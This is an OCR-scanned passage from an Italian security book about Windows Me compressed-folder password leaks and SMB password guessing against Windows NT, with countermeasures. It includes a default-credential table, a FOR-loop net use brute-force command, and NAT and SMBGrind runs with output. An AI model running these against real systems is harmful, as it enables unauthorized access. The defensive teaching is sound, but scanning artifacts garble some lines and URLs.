co, in cui la segretaria utilizza un sistema Win Me per gestire gli appuntamenti dei 
pazienti durante il giorno, mentre la stessa macchina ospita anche l'applicazione di 
contabilità utilizzata durante la sera dal direttore dello studio: come impedire alla 
segretaria di esaminare i dati contabili dello studio? 

Come potrete facilmente immaginare, la soluzione predefinita a questo problema 
consiste nell’utilizzare le funzioni già presenti nel sistema operativo, che forniscano 
o meno una soluzione efficace. 


® Recupero delle password dalle cartelle compresse 


Diffusione: 8 
Semplicità: 9 
Impatto: 8 
Fattore di rischio: 8 


Win 98 Plus! e Me forniscono una funzione chiamata Cartelle compresse, che per- 
mette di comprimere i file selezionati dall'utente in modo trasparente, per occupare 
una quantità inferiore di spazio su disco. La funzione di protezione password di 
Cartelle compresse fornita dal sistema operativo dà l'impressione agli utenti di Win 
98 Plus! e Me di poter proteggere con password i file in essa memorizzati: spesso è 
stata utilizzata da molte piccole aziende per proteggere file riservati da utenti speci- 
fici della stessa macchina Win 98 Plus! o Me. Purtroppo questa funzione non offre 
tale tipo di sicurezza, perché le password di Cartelle compresse sono registrate in 
chiaro e in formato testo, nel file C:\windows\dynazip.log sul sistema locale Win 98 
Plus! o Me; chiunque sia a conoscenza di questo fatto può aprire con semplicità il 
file e leggersi la password di qualsiasi cartella compressa sul sistema. 


IT. 2 è 
° Contromisure: recupero 
delle password delle cartelle compresse 


La migliore risposta a questo problema è non considerare sicure le password di 
Cartelle compresse. Microsoft raccomanda di aggiornarsi a Win NT o 2000, e di uti- 
lizzare account utente separati e liste di controllo dell'accesso NTFS, per regolamen- 
tare l’accesso ai file in un sistema multiutente. 


‘N Si sconsiglia di utilizzare la funzionalità Crittografia file system di Win- 

ng dows 2000 a questo scopo, perché garantisce un livello minimo di sicurezza 

di autorizzazione aggiuntiva alle protezioni NTFS standard e può essere fa- 
cilmente forzata da un hacker deciso avente l’accesso fisico al sistema. 


Sono disponibili, per Win 9x e Me, diversi prodotti di sicurezza per file di terze par- 
ti, che consigliamo caldamente nel caso in cui non possiate o non vogliate passare a 
Win NT o 2000. Uno dei nostri preferiti è PGPDisk di PGP Corporation (http: // 
ww.pgp.com). È disponibile un elenco di strumenti di cifratura di file Win 9x gratui- 
ti e dimostrativi all'indirizzo http://ww.modemspeedtest.com/crypto.htm. Non 
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avendo testato nessuno di questi strumenti, non ne raccomandiamo uno specifico, 
ma consigliamo di valutarli attentamente prima di affidare a essi la protezione di file 
molto importanti. 

Se desiderate installare aggiornamenti a funzioni di Microsoft, assolutamente super- 
flui, consultate il bollettino MS01-019 all'indirizzo http://ww.microsoft.com/ 
technet/treeview/default.asp?url=/technet/security/current.asp. 

Se adottate questa soluzione, accertatevi di eliminare anche tutti i file esistenti 
C:\windows\dynazip.log, perché non vengono cancellati. Questa vulnerabilità è ri- 
conosciuta come Bugtraq Vulnerability ID 2516. 


Capitolo 5 


Hacking di Windows NT 


Stando a quanto affermano diverse fonti, Windows NT costituisce una parte signi- 
ficativa dei sistemi di qualunque rete, privata o pubblica che sia. Soprattutto a 
causa di tale predominio, la famiglia NT è stata il bersaglio preferito degli hacker 
sin dal 1997, quando un ricercatore di nome “Hobbit” pubblicò un articolo sul 
CIFS (Common Internet File System) e VSMB (Server Message Block), le architetture 
alla base delle reti implementate con la famiglia NT. (Una copia del documento è 
disponibile all'indirizzo http://www. insecure.org/stf/cifs.txt.) Da quel mo- 
mento in poi la pubblicazione di exploit relativi a Windows NT non ha più avuto 
termine. 


> /n tuito questo libro, utilizziamo il termine “famiglia NT” per indicare 
ty tutti i sistemi basati sulla piattaforma NT (New Technology) di Micro- 
soft, vale a dire Windows NT 3.x e 4.x, Windows 2000, Windows XP e 
Windows .NET Server 2003. Ove necessario, distingueremo tra le versio- 
ni desktop e quelle server. Di contro, designeremo collettivamente i siste- 
mi Microsoft DOS/Windows 1.x/3.x/9x/Me come “famiglia DOS” (si veda 

il Capitolo 4). 


Microsoft ha risolto prontamente tutti i difetti che sono stati evidenziati da allora e 
ha rafforzato i sistemi della famiglia NT con nuove funzionalità di sicurezza man 
mano che essi si sviluppavano. Per questo motivo crediamo che la percezione cor- 
rente di Windows NT come sistema di rete non sicuro abbia scarso fondamento. Se 
affidato ad amministratori capaci, Windows NT garantisce gli stessi livelli di sicurez- 
za (o, addirittura, maggiori) dei sistemi UNIX, Linux e altri. Inoltre, com'è noto, “il 
guidatore in caso di incidente ha maggiori responsabilità dell'auto”. 

Tuttavia è evidente che questo capitolo non sarebbe così lungo se la famiglia NT 
fosse sicura al 100% senza ulteriori interventi. Nelle nostre riflessioni e analisi sulla 
sicurezza della famiglia NT, effettuate nel corso di molti anni, abbiamo individuato 
due fattori che determinano le aree di maggior rischio: la diffusione e le configura- 
zioni di default non sicure. 

La diffusione presenta alcuni vantaggi e svantaggi per gli utenti delle tecnologie 
Microsoft. Da un lato, c'è il vantaggio di un ampio supporto da parte degli svilup- 
patori, di un’accettazione quasi universale da parte degli utenti e un solido siste- 
ma di supporto a livello mondiale. Il rovescio della medaglia è che la dominante 
monocultura di Windows è sempre di più il bersaglio preferito degli hacker, che 
mettono a punto sofisticati attacchi e poi li eseguono su scala globale (come te- 
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stimoniano i casi dei worm Code Red e Nimda: visitate rispettivamente gli in- 
dirizzi http://ww.eeye.com/html/Research/Advisories/AL20010717.html e 
http://www.cert.org/advisories/CA-2001-26.html). Per quanto riguarda il 
desiderio di un hacker di acquisire notorietà (in modo corretto o discutibile), non 
c'è nulla che dia più prestigio di uno smacco a Microsoft. 


piattaforme nei confronti degli backer del mondo reale, verificate i risultati 
delle sfide OpenHack di eWeek all'indirizzo http://ww.eweek.com/ 
category2/1,3960,600431,00.asp. 


& Se desiderate conoscere come la famiglia NT si comporta rispetto ad altre 


La grande semplicità con cui l’interfaccia di Windows NT si presenta è fin troppo 
apprezzata dagli amministratori di sistema alle prime armi, che generalmente si limi- 
tano a modificare solo qualche impostazione di NT dopo aver aperto la confezione 
del software. Questa semplicità è però ingannevole; come sa bene qualsiasi ammi- 
nistratore esperto di sistemi NT, ci sono decine di impostazioni da modificare per 
garantire un buon livello di sicurezza del sistema (ecco il motivo per cui è stato 
scritto questo libro!). 

La compatibilità con il software tradizionale genera confusione e rende NT meno si- 
curo di quanto potrebbe essere. Come vedrete in questo capitolo, il fatto che NT 
continui a supportare le funzionalità tradizionali relative all’'autenticazione SMB lo 
rende totalmente vulnerabile ad alcuni tipi di attacchi ingegnosi. Ovviamente, tale 
supporto è attivato di default nelle configurazioni predefinite. 

Infine, un altro motivo per cui la famiglia NT continua a trovarsi nell’occhio del ci- 
clone è la continua proliferazione di caratteristiche e funzionalità attivate di default 
all’interno della piattaforma. Per esempio, Microsoft ha realizzato tre generazioni di 
sistemi operativi prima di rendersi conto che l'installazione e l'attivazione di default 
del software IIS Unternet Information Services) della famiglia NT mette i suoi clienti 
alla mercé degli hacker sulle reti pubbliche (Code Red e Nimda hanno come bersa- 
glio l'IIS). Una delle regole principali della sicurezza è che il rischio cui un qualsiasi 
sistema è soggetto è direttamente proporzionale alla sua complessità; quando Mi- 
crosoft avrà imparato dai suoi errori passati, eviterà di attivare il massimo di funzio- 
nalità di default. 

Ci sono però alcuni indizi che inducono a pensare che questo concetto stia comin- 
ciando a far breccia nella Casa di Redmond. A gennaio 2002, il capo e leader spiri- 
tuale di Microsoft, Bill Gates, ha inviato un memoriale ai dipendenti dell’azienda in 
cui illustra la cosiddetta filosofia del TWC (7rustWorthy Computing). Il TWC punta a 
far sì che i prodotti Microsoft soddisfino le stesse aspettative che la gente ha da tem- 
po nei confronti di oggetti e tecnologie più comuni della vita quotidiana, quali il te- 
lefono, l’acqua corrente e l'elettricità. Più importante di questi concetti altisonanti è 
stata la dichiarazione contenuta in tale memoriale, secondo cui la sicurezza dovrà 
essere considerata prioritaria rispetto all'introduzione di nuove funzionalità nei fu- 
turi progetti di sviluppo condotti da Microsoft. È stato in seguito annunciato che il 
lancio della versione di Windows .NET Server 2003 è stato posticipato in attesa che 
Microsoft completi alcuni “test di sicurezza” per esaminare il progetto e l’implemen- 
tazione del prodotto, onde individuare eventuali punti deboli. Probabilmente ormai 
Microsoft prende molto sul serio la sicurezza. 

Tuttavia solo il tempo potrà dire quanto sul serio; sicuramente rammentate che solo 
con il rilascio di NT4 Service Pack 3 sono state aggiunte alcune delle attuali funzio- 
nalità di sicurezza (per esempio SYSKEY) di questo sistema operativo e che sola- 
mente con quello di Windows 2000 Service Pack 2 sono stati eliminati alcuni dei ba- 
chi più gravi di IIS (per esempio, quelli relativi a Code Red e Nimda), il tutto in ri- 
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sposta a una serie di subdoli attacchi messi a segno dalla sempre tenace comunità 
degli hacker. 

Ora che abbiamo passato in rassegna il tema della sicurezza nella famiglia NT, fac- 
ciamo il punto della situazione prima di passare a una discussione dettagliata. 


Panoramica 


Abbiamo diviso questo capitolo in tre paragrafi principali: 
e Attacchi senza autenticazione. In questo paragrafo parleremo degli attac- 


chi remoti di reti, basati unicamente sulle informazioni relative al sistema 
bersaglio acquisite nei Capitoli 2 e 3. 


e Attacchi con autenticazione. Assumendo che uno degli attacchi descritti 
in precedenza abbia avuto successo, l'aggressore passerà ora alla scalata dei 
privilegi, se necessario, assumendo il controllo remoto del sistema violato, 
estraendo password e altre informazioni utili, installando backdoor e na- 
scondendo le sue tracce. 


e Sicurezza nella famiglia NT. Quest'ultimo paragrafo è una trattazione 
esaustiva delle contromisure incorporate nei sistemi operativi e delle proce- 
dure più opportune da adottare contro i numerosi attacchi descritti nei pa- 
ragrafi precedenti. 

Prima di iniziare la trattazione è importante sottolineare che in questo capitolo dia- 
mo per scontato che il percorso preliminare da seguire per iniziare un attacco a un 
sistema Windows NT sia già stato tracciato: prima di tutto avete selezionato l’obiet- 
tivo (Capitolo 2); quindi, avete già ottenuto l'elenco delle sue risorse (Capitolo 3). 
Come abbiamo visto nel Capitolo 2, le scansioni delle porte e la cattura dei banner 
sono i mezzi principali con cui le postazioni Windows possono essere identificate 
sulla rete. Nel Capitolo 3 abbiamo dettagliatamente mostrato come vari tool utilizza- 
ti sull'SMB “a sessione nulla” possono fornire numerose informazioni su utenti, 
gruppi e servizi Windows. In questo capitolo, sfrutteremo la mole di dati ottenuti in 
questi due capitoli per accedere agevolmente ai sistemi della famiglia NT. 


Argomenti non trattati 


Questo capitolo non offrirà comunque una trattazione completa di tutti gli strumenti 
disponibili su Internet per svolgere queste operazioni di attacco. Evidenzieremo so- 
lamente quelle che, secondo il nostro modesto parere, sono le utility più eleganti e 
funzionali, anche se illustreremo i principi generali e le metodologie di attacco. 
Quale meccanismo di apprendimento potremo concepire per aiutarvi a preparare i 
vostri sistemi Windows NT ad affrontare uno di questi attacchi? 

C'è un’omissione clamorosa: la sicurezza delle applicazioni. Probabilmente le meto- 
dologie più critiche di attacco a Windows non affrontate in questo capitolo sono le 
tecniche di hacking delle applicazioni Web. Spesso le protezioni a livello del siste- 
ma operativo vengono vanificate da tali attacchi a livello di applicazione. In questo 
capitolo parliamo del sistema operativo, in particolare del server Web incorporato 
in IIS, ma non affrontiamo il tema della sicurezza delle applicazioni. 
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Attacchi senza autenticazione 


I due meccanismi principali per la compromissione remota di sistemi della famiglia 
NT sono l’SMB e l'IIS. Sbarrando queste due vie di penetrazione, realizzerete un no- 
tevole passo avanti nella giusta direzione: rendere impenetrabili i sistemi di questa 
famiglia. In questo paragrafo mostreremo i punti deboli più critici presenti in queste 
due funzionalità e spiegheremo come affrontare tali problemi. 


Attacchi SMB (Server Message Block) 


Il metodo tradizionale per effettuare il cracking remoto dei sistemi della famiglia NT 
consiste nell’attaccare il servizio di condivisione file e stampanti, operante con il co- 
siddetto protocollo SMB (Server Message Block). Si può accedere all'SMB tramite 
due porte TCP: il NetBIOS Session Service, sulla TCP 139 e sulla TCP 445 (essenzial- 
mente si tratta dell’SMB “grezzo” su TCP, talvolta chiamato Direct Host). Le versioni 
di Windows NT precedenti Windows 2000 utilizzavano unicamente la TCP 139; 
Windows 2000 e le versioni successive si servono di default sia della 'TCP 139 sia 
della TCP 445. 


L) Ricerca della password 


Diffusione: 7 
Semplicità: 7 
Impatto: 6 
Fattore di rischio: 7 


Supponendo che SMB sia accessibile, il metodo più efficace per entrare di soppiatto 
in un sistema della famiglia NT è la vecchia cara ricerca della password: connettersi 
a una risorsa condivisa (quale IPC$ o C$) e provare le possibili combinazioni nome 
utente/password fino a trovare quella giusta. 

Naturalmente, per utilizzare con successo questo metodo è assolutamente indi- 
spensabile avere a disposizione una lista di nomi utente validi. Abbiamo già illu- 
strato alcune delle migliori utility in grado di rintracciare i nomi utente, incluso il 
metodo della connessione anonima con il comando net use, che cerca di aprire 
una porta stabilendo una sessione nulla con il sistema di destinazione. Altri stru- 
menti di cui abbimao già parlato sono DumpACL/DumpSec di Somarsoft Inc. e 
sid2user/user2sid di Evgenii Rudinyi, illustrati nel Capitolo 3. Se siete in possesso 
di un nome utente valido, la ricerca della password diventa un'attività maggior- 
mente precisa. 

Trovare un punto di condivisione appropriato per sferrare l’attacco è in genere ba- 
nale. Nel Capitolo 3 avete visto con quale facilità si può accedere alla “condivisio- 
ne” Interprocess Communications (IPC$), invariabilmente presente nei sistemi che 
esportano l’SMB. In aggiunta, sono quasi sempre presenti condivisioni amministrati- 
ve, comprese ADMIN$ e [%systemdrive%]$ (per esempio, C$), per abilitare la ricerca 
della password. Ovviamente, è anche possibile enumerare le risorse condivise (Ca- 
pitolo 3). 

In questo modo, avendo a disposizione una lista di nomi utente validi, hacker do- 
vrà semplicemente aprire la cartella Risorse di Rete per visualizzare i sistemi Win- 
dows NT presenti nella rete locale (oppure utilizzare 7rova Computer e fornire un 
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indirizzo IP valido); quindi, è sufficiente fare doppio clic sul sistema di destinazio- 
ne, come mostrato nelle due figure seguenti. 


Akuna 


Mostra le stampanti e le stampa... 
Ri Y$ Risorse del computer 
a Risorse di rete 
(=| |") Tutta la rete 
E ® Rete di Ficrosoft Windows 


I tentativi di identificare le password possono anche essere effettuati utilizzando la 
riga di comando, servendosi del comando net use. Se specificate un carattere aste- 
risco (*) al posto della password, il sistema remoto la richiederà successivamente 
come mostrato di seguito: 


C:\> net use \\192.168.202.44\IPC$ * /u:Administrator 
Type the password for \\192.168.202.44\IPC$: 
The command completed successfully. 


Pa L'utente specificato con il parametro [u: può creare confusione. Ricorda- 
Ig te che nei sistemi della famiglia NT gli account sono identificati mediante 
i SID, che sono valori numerici comprensivi delle coppie MACHINE\ac- 
count o DOMAIN\account. Se non è possibile eseguire l'autenticazione 
come amministratore, provate a utilizzare la sintassi DOMAIN\account, 
Ricordate che è possibile scoprire il dominio NT di un sistema con lo stru- 

mento di NTRK netdom. 


Gli hacker di solito cercheranno di indovinare le password degli utenti che sono defi- 
niti come /ocafli sui sistemi della famiglia NT Server installati in modalità standalone, 
piuttosto che cercare di utilizzare gli utenti globali di dominio definiti sui domain con- 
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troller. Vi è certamente maggiore probabilità che gli utenti locali siano definiti in modo 
da riflettere i piccoli difetti introdotti dai singoli amministratori di sistema, anziché in 
base ai requisiti più restrittivi per le password applicati a un’organizzazione IT centrale. 
(Questi tentativi possono essere registrati anche sul controllore di dominio.) 
Naturalmente, se riuscite a decifrare l'utente Administrator o l'account del domi- 
nio Domain Admin del PDC (Primary Domain Controller, controllore di domi- 
nio principale), avrete l’intero dominio (e qualsiasi dominio di fiducia) al vostro 
servizio. In genere, vale la pena identificare il controllore di dominio (e, per le 
reti con NT4 o versioni precedenti, il controllore di dominio principale, o PDC), 
avviare la ricerca automatizzata delle password utilizzando metodi a basso im- 
patto e contemporaneamente eseguire la scansione di un intero dominio alla ri- 
cerca di errori di configurazione (come, per esempio, sistemi con password di 
Administrator vuote), 


Se deciderete di utilizzare le tecniche seguenti per effettuare l'auditing dei 
sistemi della vostra azienda (ovviamente dopo aver ottenuto î dovuti per- 
messi), prestate attenzione a non bloccare l'autenticazione degli utenti su 
cui state effettuando i tentativi di accesso, manuali o automatizzati. Nul- 
la è peggio di una rete in cui nessun utente possa collegarsi per dissuadere 
la direzione dal proseguire con le vostre iniziative volte al miglioramento 
dei sistemi di sicurezza. Per verificare questa condizione, strumenti come 
enum (si veda il Capitolo 3) consentono di ottenere la policy sulle password 
utilizzando una sessione nulla. È opportuno, inoltre, verificare che 
l'utente Guest sia disabilitato e utilizzarlo per provare a indovinare le 
password. L'utente Guest, anche quando è disabilitato, indica se si verifi- 
ca la condizione di blocco dell'autenticazione. 


La ricerca della password è un metodo chirurgico per sfruttare gli annosi errori di 
selezione delle password degli utenti. Questi errori sono elencati di seguito. 


e  Gliutenti tendono a preferire le password di accesso più semplici in assolu- 
to, vale a dire le password vuote. Il principale difetto della sicurezza della 
maggior parte delle reti è sicuramente la presenza di nomi utente la cui 
password è vuota oppure corrispondente a una parola molto banale. Que- 
sta dovrebbe essere la priorità dell'’amministratore di sistema che sta effet- 
tuando un'indagine sui livelli di sicurezza della rete. 

e Gli utenti tendono a utilizzare password di facile memorizzazione, come il 
proprio nome utente o nome di battesimo, oppure altri termini ovvi, come 
per esempio, “nome_azienda”, “ospite”, “test”, “admin” e “password”, I 
campi di note associati ai nomi utente (visibili per esempio nell’output del 
programma DumpACL/Dump$Sec) contengono spesso indizi sulla composi- 
zione delle password. 


e Molti software commerciali per Windows NT definiscono e utilizzano un 
proprio nome utente. Questi nomi utente, con il passare del tempo, diven- 
tano di pubblico dominio, ma quel che è peggio è che vengono impostati 
quasi sempre allo stesso modo. L'identificazione di account noti simili a 
questo nella fase di enumerazione può essere di grande aiuto agli intrusi 
per identificare alcune password. 

Nella Tabella 5.1 sono elencati alcuni esempi di combinazioni nome utente/pass- 

word di utilizzo comune, che noi chiamiamo anche “combinazioni a elevata proba- 

bilità”. Inoltre, è possibile trovare un elenco esaustivo di password predefinite 
all'indirizzo http: //www.mksecure.com/defpw/. 
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Tabella 5.1 Combinazioni nome utente/password a elevata probabilità 


Nome utente Password 

Administrator NULL, password, administrator 
Arcserve arcserve, backup 

Test test, password 

Lab lab, password 

Nome utente nome utente, nome_azienda 
Backup backup 

Tivoli tivoli 

symbiator symbiator, as400 


Areserve, backupexec backup 


Generalmente, supposizioni realistiche ispirate dai suggerimenti offerti in preceden- 
za hanno una probabilità di successo incredibilmente elevata; non sono tuttavia 
molti gli amministratori disposti a sacrificare il loro tempo prezioso verificando le 
password dei loro utenti su una rete di grandi dimensioni. 

Eseguire la ricerca automatizzata delle password è semplice come realizzare un ciclo 
utilizzando il comando FOR della shell NT, basato sulla sintassi net use. Per prima co- 
sa, create un file delle coppie nome utente/password basato sulle combinazioni a ele- 
vata probabilità riportate nella Tabella 5.1 (o la vostra versione personalizzata). Que- 
sto file potrebbe avere l'aspetto mostrato di seguito. Tenete presente che per separare 
i valori è possibile utilizzare un delimitatore qualsiasi; in questo caso abbiamo utiliz- 
zato il carattere di tabulazione, Osservate anche che le password vuote devono essere 
designate come coppia di virgolette (“”) nella colonna di sinistra: 


[file: credentials.txt] 


password username 

de Administrator 
password Administrator 
admin Administrator 
administrator Administrator 
secret Administrator 
etc. 


Ora questo file lo possiamo “consegnare” al comando FOR, nel modo seguente: 


C:\>FOR /F "tokens=1,2*" %i in (credentials.txt) do net use \\target\IPC$ 
mei /U:%j 


Questo comando analizza il file credentials.txt, estraendo i primi due elementi di 
ciascuna riga e inserendo il primo come variabile %i (la password) e il secondo 
come %j (il nome utente) in una connessione net use standard di un tentativo di 
connessione a una condivisione IPC$ del server obiettivo. Per ulteriori informazioni 
sul comando FOR, digitate FOR/? nel prompt dei comandi. Si tratta di uno dei co- 
mandi maggiormente utili per gli hacker NT. 

Esistono, ovviamente, numerosi programmi dedicati che consentono di automatiz- 
zare il processo di ricerca della password. Abbiamo già accennato a due di questi: 
Legion e NAT (NetBIOS Auditing Tool), illustrati nei Capitoli 3 e 4, Il programma Le- 
gion è in grado di effettuare la scansione di intervalli di indirizzi IP di classe C alla 
ricerca di risorse condivise di Windows ed è accompagnato da un programma che 
effettua una ricerca di password, utilizzando un dizionario compilato manualmente. 
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NAT è in grado di eseguire una funzione simile, anche se su un solo sistema di 
destinazione per volta. È utilizzabile dalla riga di comando, anche se le sue attivi- 
tà possono essere avviate da uno script che le rende automatiche. NAT è in gra- 
do di connettersi al sistema di destinazione, di tentare l’accesso utilizzando un 
elenco predefinito di password oppure una lista fornita dall'utente. Uno dei prin- 
cipali difetti di NAT risiede nel fatto che, una volta individuata una coppia di 
nome utente e password corretti, il programma tenta immediatamente di accede- 
re alla risorsa utilizzando le credenziali scoperte. Per questo motivo non è possi- 
bile tentare di individuare nella stessa sessione anche le password corrispondenti 
ad altri nomi utente. Di seguito viene riportato un esempio che mostra l’utilizzo 
di un semplice ciclo FOR per effettuare la scansione con NAT di tutti gli indirizzi 
di una sottorete di classe C. L'output del programma è stato modificato per moti- 
vi di spazio: 


D:\> FOR /L %i IN (1,1,254) DO nat -u userlist.txt -p passlist.txt 

192.168.202.%I > nat_output.txt 

[*]--- Checking host: 192.168.202.1 

[*]--- Obtaining list of remote NetBIOS names 

[*]--- Attempting to connect with Username: 'ADMINISTRATOR' Password: 
'ADMINISTRATOR' 

[*]--- Attempting to connect with Username: 'ADMINISTRATOR' Password: 
'GUEST' 


]--- CONNECTED: Username: 'ADMINISTRATOR' Password: 'PASSWORD' 
]--- Attempting to access share: \\*SMBSERVER\TEMP 

]--- WARNING: Able to access share: \\*SMBSERVER\TEMP 

]--- Checking write access in: \\*SMBSERVER\TEMP 

]--- WARNING: Directory is writeable: \\*SMBSERVER\TEMP 

]--- Attempting to exercise .. bug on: \\*SMBSERVER\TEMP 


Un altro strumento valido, utilizzabile per scoprire le password vuote, è l'utility 
NTInfoScan, scritto da David Litchfield, disponibile all'indirizzo http://packet - 
stormsecurity.org/NT/audit/. NTIS è un piccolo programma utilizzabile dalla 
riga di comando, che consente di effettuare scansioni di indirizzi Internet e Net- 
BIOS, riversando i risultati dell'analisi in un file HTML. Anche questo programma è 
in grado di individuare l'elenco degli utenti, evidenziando alla fine del report i nomi 
utente la cui password associata è nulla. 

Gli strumenti che abbiamo descritto sono gratuiti e generalmente riescono a esegui- 
re con successo il loro lavoro. Se desiderate uno strumento di scansione delle pass- 
word commerciale, NAI (Network Associates Inc.) mette a disposizione il pacchetto 
CyberCop Scanner, che contiene un'utility chiamata SMBGrind, che è considerata 
estremamente rapida in quanto in grado di avviare contemporaneamente diverse 
operazioni di ricerca delle password. Il suo funzionamento non è tuttavia molto dif- 
ferente da quello di NAT. Di seguito viene riportata parte dell'output del program- 
ma SMBGrind. Il parametro -1 specifica il numero di connessioni contemporanee, 
ovvero il numero di sessioni concorrenti di ricerca delle password: 


D:\> smbgrind -1 100 -i 192.168.2.5 


Host address: 192.168.2.5 
Cracking host 192.168.2.5 (*SMBSERVER) 
Parallel Grinders: 100 
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Percent complete: @ 

Percent complete: 25 

Percent complete: 50 

Percent complete: 75 

Percent complete: 99 

Guessed: testuser Password: testuser 
Percent complete: 100 

Grinding complete, guessed i accounts 


Contromisure: difesa contro i tentativi 
di ricerca delle password 


Esistono diversi metodi in grado di eliminare, o almeno di limitare, sistemi di ricerca 
delle password, inclusi quelli elencati di seguito. 
e Utilizzo di un firewall di rete per limitare l'accesso ai servizi SMB sulle porte 
TCP 139 e 445. 
e Utilizzo di funzionalità di Windows residenti su host per limitare l’accesso 
all'SMB: 
Filtri IPSec (solo per Windows 2000 e versioni superiori); 
Internet Connection Firewall (solo per Win XP e versioni superiori). 


Disattivazione dei servizi SMB (sulle porte TCP 139 e 445). 

Applicazione di una politica rigida di utilizzo delle password. 

Definizione di una soglia di blocco degli account, da applicare all’account 
Administrator incorporato. 


e Attivazione dell’auditing dei tentativi falliti di connessione degli account ed 
esame periodico dei log degli eventi. 

Consigliamo di adottare tutti questi meccanismi per attuare una strategia di difesa 

inossidabile, se questo è possibile. Illustreremo dettagliatamente ciascuno di essi. 


Restrizioni all'accesso all’SMB mediante un firewall di rete 


Questo metodo è consigliato, se il sistema Windows NT in oggetto è un server sulla 
rete Internet che non deve rispondere alle richieste di risorse condivise di Win- 
dows. Bloccate l’accesso a tutte le porte TCP e UDP non necessarie poste sul 
firewall perimetrale o sul router, in particolare alla TCP 139 e 445. Non ci dovrebbe- 
ro essere eccezioni a questa regola, poiché l'esposizione dell’'SMB sul lato esterno 
del firewall comporta rischi eccessivi rispetto a tutta una serie di attacchi. 


Utilizzo di funzionalità Windows per limitare l’accesso ai servizi 


A partire da Windows 2000, Microsoft ha implementato IPSec (/P Security) come 
funzionalità standard del sistema operativo. IPSec consente di creare filtri per limita- 
re l’accesso a servizi basati sui parametri TCP/IP standard quali protocollo IP, indi- 
rizzo di origine, porta di destinazione TCP o UDP ecc. Parleremo ampiamente di IP- 
Sec nel paragrafo “Funzionalità di sicurezza della famiglia NT”. 


PR RRAS (Routing and Remote Access Service) implementa filtri simili a IPSec, 
Ly che tuttavia provocano un minore degrado delle prestazioni. 
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L'ICF Unternet Connection Firewall) è stato introdotto con Windows XP ed è dispo- 
nibile in .NET Server 2003 e versioni successive. L'ICF è proprio quanto suggerisce 
il nome: un firewall basato su host per Windows. Esso fornisce prestazioni eccezio- 
nali quando viene utilizzato per bloccare tutte le porte, ma è soggetto a una grave 
limitazione: non può essere utilizzato per limitare l’accesso ai servizi basati su indi- 
rizzi IP di origine. Nel paragrafo “Funzionalità di sicurezza della famiglia NT” parle- 
remo anche dell’ICF. 


Disattivazione dell’SMB (TCP 139 e 445) 


Con Windows NT4 e versioni precedenti, per disattivare la TCP 139 (il NetBIOS Ses- 
sion Service) occorreva disattivare i binding al WINS Client (TCP/IP) per qualsiasi 
scheda connessa a reti non fidate, come mostrato in questo esempio della finestra 
di dialogo Network di Windows NT. 


Identification | Services | Protocols | Adapters Bindings | 


Network bindings are connections between network cards, 
protocols, and services installed on this computer. You can use this 
page to disable network bindings or arrange the order in which this 
computer finds information on the network. 


Show Bindings for: [ all adapters *] 


=) [1] Xircom CardBus Ethemet 10/100 
Y7 NWLink IPX/SPX Compatible Transport 
Y7 TCPAP Protocol 
= WING Client(TCP/IP) 
(7) NetBIOS Interface 
(7) Remote Access Server Service 
Server 
(2 Workstation 
{2} Network Monitor Agent 
+. 9 [5] Remote Access WAN Wrapper 
+ 68) [4] Remote Access WAN Wrapper 
+ 9 [2] Remote Access WAN Wrapper 


Questa impostazione è in grado di disabilitare le porte necessarie per l'accesso a 
NetBIOS su questa interfaccia. Nel caso degli host dual-homed, è possibile disabili- 
tare NetBIOS solamente per le schede di rete connesse a Internet, mantenendo in- 
vece il protocollo attivo per quelle connesse alla rete interna; in questo modo per 
gli utenti interni sarà ancora possibile accedere alle risorse condivise di Windows 
(se si disabilita NetBIOS in questo modo, la porta esterna 139 viene ancora registra- 
ta come in ascolto ma non risponde alle richieste), 

In Windows 2000 e versioni successive, NetBIOS su TCP/IP può essere disabilitato 
aprendo la finestra di dialogo Proprietà della connessione di rete appropriata all’in- 
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terno della finestra Connessioni di rete e poi selezionando Protocollo Internet 
(TCPAP)/ Proprietà/Avanzate/ WINS/ Disabilità NetBIOS su TCPAP. 

L'aspetto di cui non ci si potrebbe rendere conto, tuttavia, è che, sebbene il tra- 
sporto NetBIOS possa essere disabilitato in questo modo, Windows 2000 continua 
a utilizzare SMB su TCP (porta 445) per la condivisione di file di Windows (si 
veda la Tabella 5.1). 

Ecco quindi lo “scherzo” che Microsoft gioca ai danni dell’utente ingenuo, convinto 
che la disabilitazione di NetBIOS su TCP/IP (tramite la scheda WZNS delle Proprietà 
della connessione LAN) risolverà i problemi di ricerca delle risorse attraverso le ses- 
sioni nulle. Accadrà esattamente il contrario: tale operazione chiude la porta ‘TCP 
139, ma non la 445. Questa operazione sembra risolvere i problemi legati alle ses- 
sioni nulle, perché gli hacker che non dispongono ancora del Service Pack 6a non 
sono in grado di connettersi alla porta 445 e creare una sessione nulla. Tuttavia i 
client successivi al SP6a e Windows 2000 possono connettersi alla porta 445 e por- 
tare a termine quelle operazioni spiacevoli che ben conosciamo (come enumerare 
gli utenti, eseguire user2sid/sid2user ecc.), e che abbiamo dettagliatamente de- 
scritto nel Capitolo 3. Non lasciatevi trarre in inganno dalle modifiche superficiali 
dell’interfaccia utente! 

Fortunatamente esiste un modo per disabilitare anche la porta 445, anche se, come 
avviene con la disabilitazione della porta 139 in Windows NT 4, richiede di entrare 
nei particolari relativi ai binding di una scheda specifica. Per prima cosa dovete tro- 
vare la scheda dei binding, perché è stata spostata in un luogo in cui nessuno pen- 
serebbe mai di guardare (un altro degli spostamenti frustranti relativi all'interfaccia 
utente). Per raggiungerla dovete aprire l’applet Connessioni di rete e selezionare 
Avanzate/Impostazioni avanzate, come mostrato nella figura seguente. 


® Connessioni di rete 


CZ Vega rosso socio 
ui ne IA 


Deselezionando Condivisione file e stampanti per reti Microsoft, come mostrato nel- 
la Figura 5.1, verranno disabilitate le sessioni nulle sulle porte 139 e 445 (insieme 
alla condivisione di file e stampanti, ovviamente). Non è necessario alcun riavvio af- 
finché questo cambiamento abbia effetto (Microsoft deve essere sinceramente elo- 
giata per aver finalmente permesso di effettuare molte modifiche alla rete senza ri- 
chiedere un riavvio). Questo rimane il metodo migliore per configurare le interfacce 
esterne di un server connesso a Internet. 


Pa La porta TCP 139 continuerà ad apparire in caso di scansione delle porte, 
yg anche dopo questa impostazione; tuttavia non fornirà più informazioni re- 
lative a NetBIOS. 


Se i vostri sistemi della famiglia NT sono file server, per cui devono conservare 
la connettività Windows, queste misure ovviamente non saranno sufficienti, poi- 
ché bloccheranno o disattiveranno tutti i servizi di questo tipo. Occorrerà adot- 
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Figura 5.1 


Disabilitare dei i file NetBIOS e SMB/CIFS e la condivisione di stampa (bloccando le sessioni nulle), 
utilizzando la finestra Network and Dia-Up Connections Advance Setting. 


